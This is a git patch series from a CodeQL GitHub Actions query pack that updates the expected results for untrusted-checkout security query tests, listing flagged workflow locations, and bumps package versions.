.github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | -| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 1d6122b3747..13e16280c33 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -1,3 +1,7 @@ +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 29237c9a544..c81666f72dc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -4,10 +4,6 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 54338f4f35274436b2a76f44c4479ec435da070d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 11:19:48 +0200 Subject: [PATCH 0607/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index c908efa68f7..867f1bfdb86 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.70 +version: 0.1.71 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d2c2e26c361..df650d0e242 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.70 +version: 0.1.71 groups: [actions, queries] suites: codeql-suites extractor: javascript From 02c5f74f2059dff88cc6f02655151e0728c28000 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 14:57:59 +0200 Subject: [PATCH 0608/1267] New gh CLI sources --- ql/lib/codeql/actions/config/Config.qll | 14 ++- .../actions/config/ConfigExtensions.qll | 7 +- .../codeql/actions/dataflow/FlowSources.qll | 30 ++++- .../security/OutputClobberingQuery.qll | 2 +- ql/lib/ext/config/untrusted_gh_command.yml | 56 +++++++++ ...commands.yml => untrusted_git_command.yml} | 2 +- .../CWE-094/.github/workflows/test19.yml | 112 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 108 +++++++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 90 ++++++++++++++ 9 files changed, 412 